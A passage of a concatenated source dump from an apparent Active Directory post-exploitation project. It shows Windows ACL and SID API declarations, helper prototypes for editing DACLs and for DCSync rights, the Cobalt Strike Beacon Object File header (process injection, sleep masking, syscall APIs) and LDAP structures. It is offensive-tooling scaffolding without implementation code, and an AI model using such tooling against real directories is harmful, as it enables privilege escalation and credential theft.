    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    DWORD dwRevision
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetSecurityDescriptorOwner(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    PSID* pOwner,
    LPBOOL lpbOwnerDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetSecurityDescriptorGroup(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    PSID* pGroup,
    LPBOOL lpbGroupDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetSecurityDescriptorDacl(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    LPBOOL lpbDaclPresent,
    PACL* pDacl,
    LPBOOL lpbDaclDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetSecurityDescriptorSacl(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    LPBOOL lpbSaclPresent,
    PACL* pSacl,
    LPBOOL lpbSaclDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetSecurityDescriptorControl(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    PSECURITY_DESCRIPTOR_CONTROL pControl,
    LPDWORD lpdwRevision
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetSecurityDescriptorOwner(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    PSID pOwner,
    BOOL bOwnerDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetSecurityDescriptorGroup(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    PSID pGroup,
    BOOL bGroupDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetSecurityDescriptorDacl(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    BOOL bDaclPresent,
    PACL pDacl,
    BOOL bDaclDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetSecurityDescriptorSacl(
    PSECURITY_DESCRIPTOR pSecurityDescriptor,
    BOOL bSaclPresent,
    PACL pSacl,
    BOOL bSaclDefaulted
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$MakeAbsoluteSD(
    PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor,
    PSECURITY_DESCRIPTOR pAbsoluteSecurityDescriptor,
    LPDWORD lpdwAbsoluteSecurityDescriptorSize,
    PACL pDacl,
    LPDWORD lpdwDaclSize,
    PACL pSacl,
    LPDWORD lpdwSaclSize,
    PSID pOwner,
    LPDWORD lpdwOwnerSize,
    PSID pGroup,
    LPDWORD lpdwGroupSize
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$MakeSelfRelativeSD(
    PSECURITY_DESCRIPTOR pAbsoluteSecurityDescriptor,
    PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor,
    LPDWORD lpdwBufferLength
);

// SID functions
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSidToStringSidA(
    PSID Sid,
    LPSTR* StringSid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertStringSidToSidA(
    LPCSTR StringSid,
    PSID* Sid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$IsValidSid(
    PSID pSid
);

DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetLengthSid(
    PSID pSid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CopySid(
    DWORD nDestinationSidLength,
    PSID pDestinationSid,
    PSID pSourceSid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$EqualSid(
    PSID pSid1,
    PSID pSid2
);

// ACL functions
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$InitializeAcl(
    PACL pAcl,
    DWORD nAclLength,
    DWORD dwAclRevision
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetAclInformation(
    PACL pAcl,
    LPVOID pAclInformation,
    DWORD nAclInformationLength,
    ACL_INFORMATION_CLASS dwAclInformationClass
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetAce(
    PACL pAcl,
    DWORD dwAceIndex,
    LPVOID* pAce
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AddAce(
    PACL pAcl,
    DWORD dwAceRevision,
    DWORD dwStartingAceIndex,
    LPVOID pAceList,
    DWORD nAceListLength
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DeleteAce(
    PACL pAcl,
    DWORD dwAceIndex
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AddAccessAllowedAce(
    PACL pAcl,
    DWORD dwAceRevision,
    DWORD AccessMask,
    PSID pSid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AddAccessAllowedAceEx(
    PACL pAcl,
    DWORD dwAceRevision,
    DWORD AceFlags,
    DWORD AccessMask,
    PSID pSid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AddAccessDeniedAce(
    PACL pAcl,
    DWORD dwAceRevision,
    DWORD AccessMask,
    PSID pSid
);

DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AddAccessDeniedAceEx(
    PACL pAcl,
    DWORD dwAceRevision,
    DWORD AceFlags,
    DWORD AccessMask,
    PSID pSid
);

// Memory allocation for ADVAPI32 functions
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem);

// GUID functions
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$UuidFromStringA(
    RPC_CSTR StringUuid,
    GUID* Uuid
);

DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$UuidToStringA(
    GUID* Uuid,
    RPC_CSTR* StringUuid
);

// ============================================================================
// SHARED FUNCTION DECLARATIONS
// ============================================================================

// Helper functions
BOOL IsDCSyncKeyword(const char* maskStr);

// Security Descriptor operations
BERVAL* ReadSecurityDescriptor(LDAP* ld, const char* objectDN);
BOOL WriteSecurityDescriptor(LDAP* ld, const char* objectDN, BERVAL* sdBerval);
PSD_INFO ParseSecurityDescriptor(BYTE* sdBuffer, DWORD sdLength);
void FreeSecurityDescriptorInfo(PSD_INFO sdInfo);

// ACE parsing and manipulation
BOOL ParseAce(PACE_HEADER aceHeader, PPARSED_ACE_INFO parsedAce);
char* GetAceTypeString(BYTE aceType);
char* GetAceFlagsString(BYTE aceFlags);
char* GetAccessMaskString(ACCESS_MASK mask);
ACCESS_MASK ParseAccessMask(const char* maskStr);
BYTE ParseAceType(const char* typeStr);
BYTE ParseAceFlags(const char* flagsStr);
char* GetInheritanceTypeString(BYTE aceFlags);

// SID utilities
char* SidToString(PSID sid);
PSID StringToSid(const char* sidString);
char* ResolveSidToName(LDAP* ld, const char* sidString, const char* defaultNC);
PSID GetSidFromAce(PACE_HEADER aceHeader);
PSID GetObjectSid(LDAP* ld, const char* objectDN);

// GUID utilities
BOOL StringToGuid(const char* guidString, GUID* guid);
char* GuidToString(GUID* guid);
char* GetGuidFriendlyName(GUID* guid);

// Display utilities
void PrintSecurityDescriptorInfo(PSD_INFO sdInfo, const char* objectDN, const char* objectSid);
void PrintAceInfo(PPARSED_ACE_INFO aceInfo, int index, const char* objectDN, const char* objectSid);

// ACL modification utilities
PACL CreateNewDaclWithAce(PACL oldDacl, PSID trusteeSid, ACCESS_MASK accessMask, 
                          BYTE aceType, BYTE aceFlags, GUID* objectTypeGuid, GUID* inheritedObjectTypeGuid);
PACL CreateNewDaclWithoutAces(PACL oldDacl, DWORD* aceIndicesToRemove, DWORD removeCount);
BERVAL* ConvertSecurityDescriptorToBerval(PSECURITY_DESCRIPTOR pSD);
PSECURITY_DESCRIPTOR ConvertBervalToSecurityDescriptor(BERVAL* sdBerval);

#endif // ACL_COMMON_H

================================================
FILE: AD-BOF/LDAP-BOF/_include/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 *    3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL
 *               Updated the BEACON_INFO data structure to add new parameters
 *    4/19/2024: Added BeaconGetSyscallInformation API for 4.10
 *    4/25/2024: Added APIs to call Beacon's system call implementation
 *    12/18/2024: Updated BeaconGetSyscallInformation API for 4.11 (Breaking changes)
 *    2/13/2025: Updated SYSCALL_API structure with more ntAPIs for 4.11
 *    3/20/2025: Updated ALLOCATED_MEMORY_SECTION structure with driploader page size for 4.12
 *    4/7/2025: Updated ALLOCATED_MEMORY_REGION structure with driploader allocation granularity for 4.12
 *    7/16/2025: Updated ALLOCATED_MEMORY_PURPOSE structure with PURPOSE_UDC2_MEMORY for 4.12
 */
#ifndef _BEACON_H_
#define _BEACON_H_
#include <windows.h>

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, const char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, const char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d
#define CALLBACK_CUSTOM      0x1000
#define CALLBACK_CUSTOM_LAST 0x13ff


DECLSPEC_IMPORT void   BeaconOutput(int type, const char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, const char * fmt, ...);
DECLSPEC_IMPORT BOOL   BeaconDownload(const char * filename, const char* buffer, unsigned int length);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/* Information the user can set in the USER_DATA via a UDRL */
typedef enum {
	PURPOSE_EMPTY,
	PURPOSE_GENERIC_BUFFER,
	PURPOSE_BEACON_MEMORY,
	PURPOSE_SLEEPMASK_MEMORY,
	PURPOSE_BOF_MEMORY,
	PURPOSE_UDC2_MEMORY,
	PURPOSE_USER_DEFINED_MEMORY = 1000
} ALLOCATED_MEMORY_PURPOSE;

typedef enum {
	LABEL_EMPTY,
	LABEL_BUFFER,
	LABEL_PEHEADER,
	LABEL_TEXT,
	LABEL_RDATA,
	LABEL_DATA,
	LABEL_PDATA,
	LABEL_RELOC,
	LABEL_USER_DEFINED = 1000
} ALLOCATED_MEMORY_LABEL;

typedef enum {
	METHOD_UNKNOWN,
	METHOD_VIRTUALALLOC,
	METHOD_HEAPALLOC,
	METHOD_MODULESTOMP,
	METHOD_NTMAPVIEW,
	METHOD_USER_DEFINED = 1000,
} ALLOCATED_MEMORY_ALLOCATION_METHOD;

/**
* This structure allows the user to provide additional information
* about the allocated heap for cleanup. It is mandatory to provide
* the HeapHandle but the DestroyHeap Boolean can be used to indicate
* whether the clean up code should destroy the heap or simply free the pages.
* This is useful in situations where a loader allocates memory in the
* processes current heap.
*/
typedef struct _HEAPALLOC_INFO {
	PVOID HeapHandle;
	BOOL  DestroyHeap;
} HEAPALLOC_INFO, *PHEAPALLOC_INFO;

typedef struct _MODULESTOMP_INFO {
	HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;

typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
	HEAPALLOC_INFO HeapAllocInfo;
	MODULESTOMP_INFO ModuleStompInfo;
	PVOID Custom;
} ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
	BOOL Cleanup;
	ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod;
	ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation;
} ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_SECTION {
	ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development
	PVOID  BaseAddress;           // Pointer to virtual address of section
	SIZE_T VirtualSize;           // Virtual size of the section
	DWORD  CurrentProtect;        // Current memory protection of the section
	DWORD  PreviousProtect;       // The previous memory protection of the section (prior to masking/unmasking)
	BOOL   MaskSection;           // A boolean to indicate whether the section should be masked
	DWORD  DripLoadPageSize;      // The page size used when committing memory during drip-loading
} ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION;

typedef struct _ALLOCATED_MEMORY_REGION {
	ALLOCATED_MEMORY_PURPOSE Purpose;      // A label to indicate the purpose of the allocated memory
	PVOID  AllocationBase;                 // The base address of the allocated memory block
	SIZE_T RegionSize;                     // The size of the allocated memory block
	DWORD Type;                            // The type of memory allocated
	DWORD DripLoadAllocationGranularity;   // The allocation granularity used when reserving memory for drip-loading
	ALLOCATED_MEMORY_SECTION Sections[8];  // An array of section information structures
	ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation
} ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION;

typedef struct {
	ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6];
} ALLOCATED_MEMORY, *PALLOCATED_MEMORY;

/*
 *  version               - The version of the beacon dll was added for release 4.10
 *                          version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 *                          e.g. 0x040900 -> CS 4.9
 *                               0x041000 -> CS 4.10
 *
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 *
 *  Added in version 4.10
 *  allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA
 *                     via a UDRL.
 */
typedef struct {
	unsigned int version;
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];

	ALLOCATED_MEMORY allocatedMemory;
} BEACON_INFO, *PBEACON_INFO;

DECLSPEC_IMPORT BOOL   BeaconInformation(PBEACON_INFO info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

/* Beacon System call */
/* Syscalls API */
typedef struct
{
	PVOID fnAddr;
	PVOID jmpAddr;
	DWORD sysnum;
} SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY;

typedef struct
{
	SYSCALL_API_ENTRY ntAllocateVirtualMemory;
	SYSCALL_API_ENTRY ntProtectVirtualMemory;
	SYSCALL_API_ENTRY ntFreeVirtualMemory;
	SYSCALL_API_ENTRY ntGetContextThread;
	SYSCALL_API_ENTRY ntSetContextThread;
	SYSCALL_API_ENTRY ntResumeThread;
	SYSCALL_API_ENTRY ntCreateThreadEx;
	SYSCALL_API_ENTRY ntOpenProcess;
	SYSCALL_API_ENTRY ntOpenThread;
	SYSCALL_API_ENTRY ntClose;
	SYSCALL_API_ENTRY ntCreateSection;
	SYSCALL_API_ENTRY ntMapViewOfSection;
	SYSCALL_API_ENTRY ntUnmapViewOfSection;
	SYSCALL_API_ENTRY ntQueryVirtualMemory;
	SYSCALL_API_ENTRY ntDuplicateObject;
	SYSCALL_API_ENTRY ntReadVirtualMemory;
	SYSCALL_API_ENTRY ntWriteVirtualMemory;
	SYSCALL_API_ENTRY ntReadFile;
	SYSCALL_API_ENTRY ntWriteFile;
	SYSCALL_API_ENTRY ntCreateFile;
	SYSCALL_API_ENTRY ntQueueApcThread;
	SYSCALL_API_ENTRY ntCreateProcess;
	SYSCALL_API_ENTRY ntOpenProcessToken;
	SYSCALL_API_ENTRY ntTestAlert;
	SYSCALL_API_ENTRY ntSuspendProcess;
	SYSCALL_API_ENTRY ntResumeProcess;
	SYSCALL_API_ENTRY ntQuerySystemInformation;
	SYSCALL_API_ENTRY ntQueryDirectoryFile;
	SYSCALL_API_ENTRY ntSetInformationProcess;
	SYSCALL_API_ENTRY ntSetInformationThread;
	SYSCALL_API_ENTRY ntQueryInformationProcess;
	SYSCALL_API_ENTRY ntQueryInformationThread;
	SYSCALL_API_ENTRY ntOpenSection;
	SYSCALL_API_ENTRY ntAdjustPrivilegesToken;
	SYSCALL_API_ENTRY ntDeviceIoControlFile;
	SYSCALL_API_ENTRY ntWaitForMultipleObjects;
} SYSCALL_API, *PSYSCALL_API;

/* Additional Run Time Library (RTL) addresses used to support system calls.
 * If they are not set then system calls that require them will fall back
 * to the Standard Windows API.
 *
 * Required to support the following system calls:
 *    ntCreateFile
 */
typedef struct
{
	PVOID rtlDosPathNameToNtPathNameUWithStatusAddr;
	PVOID rtlFreeHeapAddr;
	PVOID rtlGetProcessHeapAddr;
} RTL_API, *PRTL_API;

/* Updated in version 4.11 to use the entire structure instead of pointers to the structure.
 * This allows for retrieving a copy of the information which would be under the BOF's
 * control instead of a reference pointer which may be obfuscated when beacon is sleeping.
 */
typedef struct
{
	SYSCALL_API syscalls;
	RTL_API     rtls;
} BEACON_SYSCALLS, *PBEACON_SYSCALLS;

/* Updated in version 4.11 to include the size of the info pointer, which equals sizeof(BEACON_SYSCALLS) */
DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, SIZE_T infoSize, BOOL resolveIfNotInitialized);

/* Beacon System call functions which will use the current system call method */
DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle);
DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId);
DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId);
DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object);
DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress);
DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length);
DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

/* Beacon Gate APIs */
DECLSPEC_IMPORT VOID BeaconDisableBeaconGate();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGate();

DECLSPEC_IMPORT VOID BeaconDisableBeaconGateMasking();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGateMasking();

/* Beacon User Data
 *
 * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 * e.g. 0x040900 -> CS 4.9
 *      0x041000 -> CS 4.10
*/

#define DLL_BEACON_USER_DATA 0x0d
#define BEACON_USER_DATA_CUSTOM_SIZE 32
typedef struct
{
	unsigned int version;
	PSYSCALL_API syscalls;
	char         custom[BEACON_USER_DATA_CUSTOM_SIZE];
	PRTL_API     rtls;
	PALLOCATED_MEMORY allocatedMemory;
} USER_DATA, * PUSER_DATA;

#ifdef __cplusplus
}
#endif // __cplusplus
#endif // _BEACON_H_


================================================
FILE: AD-BOF/LDAP-BOF/_include/ldap_common.h
================================================
#ifndef LDAP_COMMON_H
#define LDAP_COMMON_H

#include <windows.h>

// LDAP timeval structure
struct l_timeval {
    LONG tv_sec;
    LONG tv_usec;
};

// LDAP structures and constants
typedef struct ldap {
    struct {
        UINT_PTR sb_sd;
        UCHAR Reserved1[(10*sizeof(ULONG))+1];
        ULONG_PTR sb_naddr;
        UCHAR Reserved2[(6*sizeof(ULONG))];
    } ld_sb;
    PCHAR ld_host;
    ULONG ld_version;
    UCHAR ld_lberoptions;
    ULONG ld_deref;
    ULONG ld_timelimit;
    ULONG ld_sizelimit;
    ULONG ld_errno;
    PCHAR ld_matched;
    PCHAR ld_error;
    ULONG ld_msgid;
    UCHAR Reserved3[(6*sizeof(ULONG))+1];
    ULONG ld_cldaptries;
    ULONG ld_cldaptimeout;
    ULONG ld_refhoplimit;
    ULONG ld_options;
} LDAP, *PLDAP;

typedef struct berval {
    ULONG bv_len;
    PCHAR bv_val;
} LDAP_BERVAL, *PLDAP_BERVAL, BERVAL, *PBERVAL, BerValue;

typedef struct berelement {
  PCHAR opaque;
} BerElement;

typedef struct ldapmodA {
    ULONG mod_op;
    PCHAR mod_type;
    union {
        PCHAR *modv_strvals;
        struct berval **modv_bvals;
    } mod_vals;
} LDAPModA, *PLDAPModA;

typedef struct ldapcontrolA {
    PCHAR ldctl_oid;
    struct berval ldctl_value;
    BOOLEAN ldctl_iscritical;
} LDAPControlA, *PLDAPControlA;

typedef struct ldapmsg {
    ULONG lm_msgid;
    ULONG lm_msgtype;
    PVOID lm_ber;
    struct ldapmsg* lm_chain;
    struct ldapmsg* lm_next;
    ULONG lm_time;
    LDAP* Connection;
    PVOID Request;
    ULONG lm_returncode;
    USHORT lm_referral;
    BOOLEAN lm_chased;
    BOOLEAN lm_eom;
    BOOLEAN ConnectionReferenced;
} LDAPMessage, *PLDAPMessage;

// LDAP Constants
#define LDAP_PORT 389
#define LDAP_SSL_PORT 636
#define LDAP_VERSION3 3

// LDAP SSL Options
#define LDAP_OPT_SSL 0x0a
#define LDAP_OPT_SSL_OFF 0
#define LDAP_OPT_SSL_ON 1

// LDAP Operation Constants
#define LDAP_MOD_ADD 0x00
#define LDAP_MOD_DELETE 0x01
#define LDAP_MOD_REPLACE 0x02
#define LDAP_MOD_BVALUES 0x80

// LDAP Return Codes
#define LDAP_SUCCESS 0x00
#define LDAP_OPERATIONS_ERROR 0x01
#define LDAP_PROTOCOL_ERROR 0x02
#define LDAP_TIMELIMIT_EXCEEDED 0x03
#define LDAP_ALREADY_EXISTS 0x44
#define LDAP_INSUFFICIENT_RIGHTS 0x32
#define LDAP_INVALID_DN_SYNTAX 0x22
#define LDAP_NO_SUCH_OBJECT 0x20
#define LDAP_SERVER_DOWN 0x51
#define LDAP_INVALID_CREDENTIALS 0x31
#define LDAP_NO_SUCH_ATTRIBUTE 0x10
#define LDAP_CONSTRAINT_VIOLATION 0x13
#define LDAP_TYPE_OR_VALUE_EXISTS 0x14
#define LDAP_ATTRIBUTE_OR_VALUE_EXISTS	LDAP_TYPE_OR_VALUE_EXISTS
#define LDAP_UNWILLING_TO_PERFORM 0x35
#define LDAP_OBJECT_CLASS_VIOLATION 0x41

// LDAP Options
#define LDAP_OPT_PROTOCOL_VERSION 0x11
#define LDAP_OPT_VERSION 0x11
#define LDAP_OPT_SERVER_CERTIFICATE 0x81
#define LDAP_OPT_SIGN 0x95
#define LDAP_OPT_ENCRYPT 0x96

// LDAP SSL Certificate Verification
#define LDAP_OPT_ON ((void*)1)
#define LDAP_OPT_OFF ((void*)0)

// Certificate callback type
typedef BOOLEAN (*VERIFYSERVERCERT)(PLDAP Connection, PCCERT_CONTEXT pServerCert);

// Authentication methods
#define LDAP_AUTH_NEGOTIATE 0x0486

// LDAP search scope values
#define LDAP_SCOPE_BASE 0x00
#define LDAP_SCOPE_ONELEVEL 0x01
#define LDAP_SCOPE_SUBTREE 0x02

// LDAP Server Controls
#define LDAP_SERVER_SD_FLAGS_OID "1.2.840.113556.1.4.801"

// User Account Control (UAC) flags
// Reference: https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
#define UF_SCRIPT                           0x00000001  // Logon script executed
#define UF_ACCOUNTDISABLE                   0x00000002  // Account disabled
#define UF_HOMEDIR_REQUIRED                 0x00000008  // Home directory required
#define UF_LOCKOUT                          0x00000010  // Account locked out
#define UF_PASSWD_NOTREQD                   0x00000020  // No password required
#define UF_PASSWD_CANT_CHANGE               0x00000040  // User cannot change password
#define UF_ENCRYPTED_TEXT_PWD_ALLOWED       0x00000080  // Store password using reversible encryption
